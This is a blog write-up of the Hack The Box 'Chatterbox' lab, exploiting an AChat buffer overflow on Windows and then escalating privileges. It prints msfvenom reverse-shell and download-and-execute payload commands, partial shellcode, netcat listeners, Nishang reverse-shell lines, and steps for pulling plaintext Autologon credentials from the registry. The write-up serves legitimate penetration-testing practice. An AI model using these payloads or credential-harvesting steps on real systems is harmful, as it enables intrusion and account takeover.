Hack The Box — Chatterbox

Chatterbox is a Medium level Windows BufferOverflow machine on hack the box and a part of Tj null’s playlist for OSCP prep.This is a buffer overflow machine in which we run our exploit on the Achat service.We also abuse permissions using icacls to read the root flag.I will covering both ways to solve this machine.

NOTE: This box is highly unstable and the only ports open are 9255 and 9256.So first do an nmap on these ports and check if Achat service is running instead of doing a full port scen(-p- ) If Achat service is not running, restart the machine.Users have often reported losing their shells as well.

ENUMERATION

The only ports open are 9255 and 9256 which seems to run a wierd service called Achat, so lets google it and we learn that it is vulnerable to buffer overflow attacks.

We use searchsploit to find any exploits for Achat service and we do find one and download it using (- m) and it gets saved as 36025.py by default.

If we open the exploit code, we see a comment # of a msfvenom command which the author had hopefully left for us to make the shellcode.

However we have to make some changes to the script. Instead of using a windows/exec payload which is used by default in the script to run an executable called calc.exe, we will rather use a windows/shell_reverse_tcp payload (-p) instead of windows/exec payload used by default in the script and thus also remove the CMD=calc.exe since we are not executing any executable. moreover we need to add LHOST and LPORT.

THIS IS WHAT OUR FINAL MSFVENOM COMMAND SHOULD LOOK LIKE-

msfvenom -a x86 — platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.22 LPORT=7777 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python

Copy the Shellcode and replace it with default (buf) part of the script

NOTE: In our default script, if we scroll down,we see that there is a maximum length limit of 1152 bytes on the payload(refer the image below). Anything that exceeds that will probably not work. We’ll keep that in mind when using msfvenom to generate our reverse shell.(luckily our previous msfvenom command made a shellcode of around 774 bytes so within the limit)

There seems to be a length limit of 1152 bytes on the payload. Anything that exceeds that will probably not work. We’ll keep that in mind when using msfvenom to generate our reverse shell.
Our shellcode is of 774 bytes SO within the limit

We also have to change the ip and port to that of our target.

Change the default ip and port to that of the TARGET windows

Now Start a netcat listener on port 7777 and FINALLY we run the exploit using — python 36025.py

AND WE HAVE A SHELL !!!

READING ROOT.txt

We can now try running commands like whoami /priv, systeminfo to find our more about our target.We can also run scripts like Powerup.ps1 or WINPEAS.

Seems like Potato attacks wont work due to lack of privileges.SetImpersonatePrivilege is not enabled so we can’t use the Juicy Potato exploit to escalate privileges.

In systeminfo command, look at the option called HOTFIX which is basically a list of patches.We see a lot of patches on the system so it seems like Kernel Exploit wont work.Otherwise we could had found one by searching for the system build. Anyways lets look at directories. . .

we find root.txt in administrator/desktop however we are unable to read it. However the wierd part is that we can access /administrator because generally we do not have the permission to access this folder and it shows access denied.(if you have solved other boxes on HTB, you will understand)

we find root.txt in administrator/desktop

Lets see what other permissions we have on this root.txt file.We can use icacls to view permissions. And we see that the administrator has (F) Full Access to root.txt .

(However don’t forget that we are still not administrator we are currently a normal user called Alfred )

Currently we are Alfred

Lets also run the icacls command on the current directory since we were able to access it as a regular user Alfred we must surely be having some access to the directory! and Volia we see that Alfred has (F) Full Access to the current directory.In fact Alfred has been configured to own the root.txt file since it has (OI)-Object Inherit. For more info, refer a guide on icacls on google

If we even google how to grant permission to a user using icacls, we find this on stackoverflow-

So lets grant ourselves(Alfred) access to it using the following command.And Finally we are able to read the root flag.

ALTERNATE METHOD- POWERSHELL

We can also try using windows/powershell_reverse_tcp payload (-p) instead of windows/shell_reverse_tcp as used earlier-

This part of the writeup has been taken from Rana Khalil’s writeup as a part of my notekeeping.Since i was unable to access the box as it got crashed,i was unable to cover it in the writeup.

(Link to Rana Khalil’s writeup-https://ranakhalil101.medium.com/hack-the-box-chatterbox-writeup-w-o-metasploit-c8421ac09318)

COMMAND

msfvenom -a x86 — platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.22 LPORT=6666 -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python

HOWEVER WE SEE THAT THE PAYLOAD SIZE EXCEEDS THE SIZE LIMIT MENTIONED IN THE EXPLOIT !!!

The size of the payload is 3626 bytes and has exceeded the max limit

So instead, we’ll just use the windows/exec module to download and execute the Nishang reverse shell.

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the attack machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234

When called, this sends a reverse shell back to our attack machine on port 1234.

Setup a listener to receive the reverse shell.

nc -nlvp 1234

Next, use msfvenom to generate a payload that downloads the PowerShell script and executes it.

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

We get back the following result.

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 684 (iteration=0)
x86/unicode_mixed chosen with final size 684
Payload size: 684 bytes
Final size of python file: 3330 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
.....[redacted]

Good! The payload size is 684 bytes, so it’s within the limit. Copy the payload and add it in place of the payload included in the exploit.

Start up a python server in the directory that the PowerShell script resides in.

python -m SimpleHTTPServer 5555

Run the exploit.

root@kali:~/Desktop/htb/chatterbox# python 36025.py 
---->{P00F}!

We get a PowerShell shell!

We’ll use the PowerUp.ps1 script to determine if there are any misconfigurations that lead to privilege escalation.

Upload and run the script on the target machine.

PS C:\Users\Alfred\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/PowerUp.ps1')PS C:\Users\Alfred\Desktop> Invoke-AllChecks

We get back two interesting results.

[*] Checking for Autologon credentials in registry...DefaultDomainName    : 
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :[*] Checking for unattended install files...UnattendPath : C:\Windows\Panther\Unattend.xml

Viewing the Unattend.xml file, we see that the password was redacted. So let’s focus on the Autologon credentials. The default username is “Alfred” and the default password is “Welcome1!”. I don’t have much experience with Windows, so I googled- Autologin credentials to learn more about it.

As stated in the article, these credentials are stored in the registry in plain text. The manual commands for extracting these credentials are:

PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName                                                                                                                         
Alfred PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
Welcome1!

These credentials are set by the administrator. Since users have a tendency to reuse passwords, let’s see if the administrator account is set to the same password.

To do that, first run the following command to convert the plain text string “Welcome1!” into a secure string and store the result in the $password variable.

$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
  • ConvertTo-SecureString: Converts plain text to secure strings.
  • -AsPlainText: Specifies a plain text string to convert to a secure string.
  • -Force: Confirms that you understand the implications of using the AsPlainText parameter and still want to use it.

Second, create a new object to store these credentials.

$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)

Third, we’ll use these credentials to start PowerShell and send a (hopefully privileged) reverse shell back to our attack machine.

In the attack machine, copy the shell.ps1 script we used earlier and save it in the file shell-admin.ps1.

cp shell.ps1 shell-admin.ps1

Change shell-admin.ps1 to send a reverse shell to our attack machine on port 6666.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666

Setup a python server in the directory that the script resides in.

python -m SimpleHTTPServer 5555

Setup a listener to receive the reverse shell.

nc -nlvp 6666

On the target machine, use the credentials to start PowerShell to download the shell-admin.ps1 script, run it and send a reverse shell back to our attack machine.

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred

We get a shell with administrator privileges!

Now we can view the root.txt flag without having to change the ACL permissions on it.

CONCLUSION

In this box we learnt that -

  • We can run bufferoverflow exploit on a vulnerable service after making certain changes to the exploit.However we need to make sure that the shellcode which we generate using msfvenom it is within the maximum limit.
  • There are multiple payloads which can be used with msfvenom like :

windows/shell_reverse_tcp OR windows/powershell_reverse_tcp OR

windows/exec CMD=”powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1')" ~make changes accordingly

  • We can use icacls to view or grant file permissions to users
  • We can abuse Autologon feature in windows to view credentails in plain text and also sometimes reuse the user credentials to log in as admin since often the user passwords are reused by the admin user.

I hope you find this writeup helpful and make sure to follow me here on Medium for more such ctfs writeups.

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

USDT Savings Round 12 is Open

89/365 — Another sunrise

HOW TO CHOOSE THE RIGHT STATIC BIKE TO HELP YOU EXERCISE

Why only simplefied Chinese?

BRIDGE

Welcome Home

Water Development Board Jobs 2022

My first published content!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Devel

TryHackme: Overpass by NinjaJc01

HTB Write-up Jeeves (Windows) File Transferring with SMB file share(impacket tool), Poweshell &…

TryHackMe — Year of the Rabbit Write-Up